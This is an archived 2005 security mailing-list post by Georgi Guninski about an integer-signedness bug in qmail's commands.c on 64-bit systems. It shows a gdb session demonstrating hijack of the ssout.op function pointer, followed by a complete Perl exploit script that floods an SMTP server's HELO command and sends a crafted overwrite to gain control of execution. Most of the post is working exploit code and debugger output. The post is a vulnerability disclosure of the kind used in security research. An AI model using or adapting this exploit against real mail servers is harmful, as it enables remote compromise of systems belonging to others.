| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20050515124849.GC5201@sivokote.iziade.m$>
Date: Sun May 15 13:48:39 2005
From: guninski at guninski.com (Georgi Guninski)
Subject: 64 bit qmail fun
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
>
> 2. pointer + signed int in commands.c
> int i;
> ...
> i = str_chr(cmd.s,' ');
> ...
> cmd.s[i] = 0;
>
problem #2 is exploitable at least on freebsd 5.4 amd64 with a lot of
virtual memory.
original djb's qmail was compiled with debug info, no optimizations and not
stripped.
Breakpoint 1, commands (ss=0x507520, c=0x507540) at commands.c:34
34 cmd.s[i] = 0;
(gdb) p cmd
$12 = {s = 0x4b507000 '?' <repeats 200 times>..., len = 3036683527,
^^^^^^^^^^
a = 3184650962}
(gdb) p i
$13 = -1258283773
(gdb) p &cmd.s[i]
$14 = 0x508d03 "K"
(gdb) next
36 for (i = 0;c[i].text;++i) if (case_equals(c[i].text,cmd.s)) break;
(gdb) p cmd
$15 = {s = 0x507000 " server failed (#4.4.2)", len = 3036683527,
^^^^^^^^^^^^^
a = 3184650962}
(gdb) p &ssout
$16 = (substdio *) 0x507500
(gdb) p &ssout.op
$17 = (int (**)()) 0x507518
(gdb) cont
Program received signal SIGTRAP, Trace/breakpoint trap.
0x000000000050cbac in ?? ()
(gdb) x/i $rip
0x50cbac: int3
(gdb) p ssout
$18 = {
x = 0x102030405060708 <Error reading address 0x102030405060708: Bad address>, p = 0, n = 32, fd = 2, op = 0x50cbab}
(gdb) info stack
#0 0x000000000050cbac in ?? ()
#1 0x0000000000405bce in allwrite (op=0x50cbab, fd=2,
buf=0x102030405060708 <Error reading address 0x102030405060708: Bad address>, len=16) at substdo.c:15
#2 0x0000000000405c63 in substdio_flush (s=0x507500) at substdo.c:35
#3 0x0000000000405d6e in substdio_put (s=0x507500,
buf=0x406988 "502 unimplemented (#5.5.1)\r\n", len=28) at substdo.c:64
#4 0x0000000000405efc in substdio_puts (s=0x507500,
buf=0x406988 "502 unimplemented (#5.5.1)\r\n") at substdo.c:100
#5 0x0000000000400daf in out (s=0x406988 "502 unimplemented (#5.5.1)\r\n")
at qmail-smtpd.c:43
#6 0x0000000000400f13 in err_unimpl () at qmail-smtpd.c:54
(gdb) x/i helohost.s
0x50c000: int3
(gdb) p &cmd
$19 = (stralloc *) 0x508d00
qmlong-pubvvv5.pl - run on freebsd 5.4 amd64
------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
use IO::Socket;
my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;
my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");
#my $sock;
#open ($sock, '+>',"/dev/null") || die("open");
##my $wriaddr = 0xb5bfa660 - 0x140;
my $wriaddr = 0xb5001e43 - 0x140;
my $wrimeg = int($wriaddr/(1024*1024)) ;
my $wrioff = $wriaddr % (1024*1024) ;
my $headdr = 0x42aa6000;
my $heameg = int($headdr/(1024*1024));
my $heaoff = $headdr % (1024*1024);
print $wrimeg . " " . $wrioff;
my $payload="\xcc" x (1024*1024);
my $i=0;
print $sock "HELO ";
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
if ($i == $heameg) {last;}
}
print $sock "v" x $heaoff;
print $sock "\r\n";
print "\nHELO sent\n";
$i=0;
while(42)
{
print $sock $payload;
$i++;
print "${i}\n";
if ($i == $wrimeg) {last;}
}
my $zer1 = "v" x $wrioff . " vvv\r\n";
print $zer1;
print $sock $zer1;
print "\nspace/zero sent\n";
$i=0;
my $vvover= "AB" . ("v" x (0x500-2));
$vvover .= pack("Q",0x0102030405060708); #x
$vvover .= pack("I",0x10);
$vvover .= pack("I",0x20);
$vvover .= pack("I",0x2);
$vvover .= pack("I",0x42);
$vvover .= pack("Q",0x50cbab); #op
$vvover .= "\x21" . "\n" x 100;
## ^^^ ssin.x + 1
print $sock $vvover;
print "\nprobably done\n";
while(42) {};
--
where do you want bill gates to go today?
** junk
Powered by blists - more mailing lists